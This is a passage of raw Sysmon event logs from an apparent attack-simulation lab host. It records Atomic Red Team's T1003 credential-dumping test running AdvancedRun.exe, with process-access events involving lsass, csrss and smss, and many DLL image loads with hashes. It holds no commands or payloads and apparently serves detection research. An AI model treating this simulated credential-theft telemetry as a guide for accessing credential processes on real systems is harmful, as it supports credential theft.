dvancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942534Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942508Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 